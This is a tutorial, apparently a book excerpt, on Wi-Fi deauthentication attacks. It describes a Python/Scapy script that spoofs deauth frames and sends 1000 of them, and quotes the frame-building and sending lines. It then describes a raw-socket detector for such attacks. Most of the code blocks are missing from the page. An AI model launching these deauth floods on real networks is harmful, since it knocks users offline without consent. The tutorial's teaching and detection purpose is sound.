See how the deauthentication attacks take place and how you can detect it in this tutorial by Mohit Raj, the author of Python Penetration Testing Essentials.
The deauthentication (deauth) attack
Deauthentication frames fall under the category of the management frames. When a client wishes to disconnect from the AP, the client sends the deauthentication frame. The AP also sends the deauthentication frame in the form of a reply. This is the normal process, but an attacker can take advantage of this process.
The attacker can spoof the MAC address of the victim and send the deauth frame to the AP on behalf of the victim; because of this, the connection to the client is dropped. The aireplay-ng program is the best tool to accomplish a deauth attack.
In this section, you will learn how to carry out this attack using Python. You can leverage the output of the ssid_finder_raw.py code because the ssid_finder_raw.py program writes a file.
Now take a look at the following code:
- Import the essential modules and libraries:
- The following code opens the
wireless_data.datfile, fetches the information, and displays it to the user:
- The following code asks the user to enter the AP sequence number. If the user wants to specify any victim, then the user can provide the MAC of the victim’s machine; otherwise, the code will pick the broadcast address:
- The channel number is being used by a selected AP; the following piece of code sets the same channel number for
mon0:
- This code is very easy to understand. The
frame= RadioTap()/ Dot11(addr1=victim_mac,addr2=BSSID, addr3=BSSID)/ Dot11Deauth()statement creates the deauth packet:
- The following code tells the threads to start the deauth attack:
In the last line, sendp(frame,iface=interface, count= 1000, inter= .1), count gives the total number of packets sent, and inter indicates the interval between the two packets:
The output of the deauth.py program is as follows:
The aim of this attack is to not only perform a deauth attack but also to check the victim’s security system. IDS should have the ability to detect the deauth attack. So far, there is no way of avoiding the attack, but it can be detected.
Detecting the deauth attack
In this section, you’ll learn how to detect a deauth attack. In the deauth_ids.py program, you’ll find which access points get deauth frames and how many. You need to use the raw socket here to detect the attack.
Make sure the monitor is on; otherwise, the program will give an error:
- Import the essential modules and libraries:
- The queue and counter will be used later:
- The following code creates and binds the raw socket to
mon0:
- The following function IDs receive the deauth frames, extract the BSSID, and put it in the global queue:
- The following
insert_framefunction gets the deauth frame from the global queue and makes a counter to display it:
- The following code creates two threads that start the
ids()andinsert_framefunctions:
In order to perform both the attack and detection, you’d need two machines with Linux and one wireless access point. One machine will perform the attack, while the second will run the deauth_ids.py detection program.
For testing purposes, run deauth_ids.py, and from the second machine, start the deauth attack. Here’s the output:
You can see it is continuously displaying the victim BSSID, and its counter shows the number of frames received. Here’s another screenshot in continuation:
As you can see, if the attacker changes the target, the program can still detect the attack on multiple access points.
If you found this article interesting and want to learn more about cybersecurity, you can explore Python Penetration Testing Essentials. Updated for Python 3.6.3 and Kali Linux 2018.1, this book gives you the skills you need to use Python for penetration testing, with the help of detailed hands-on code examples.
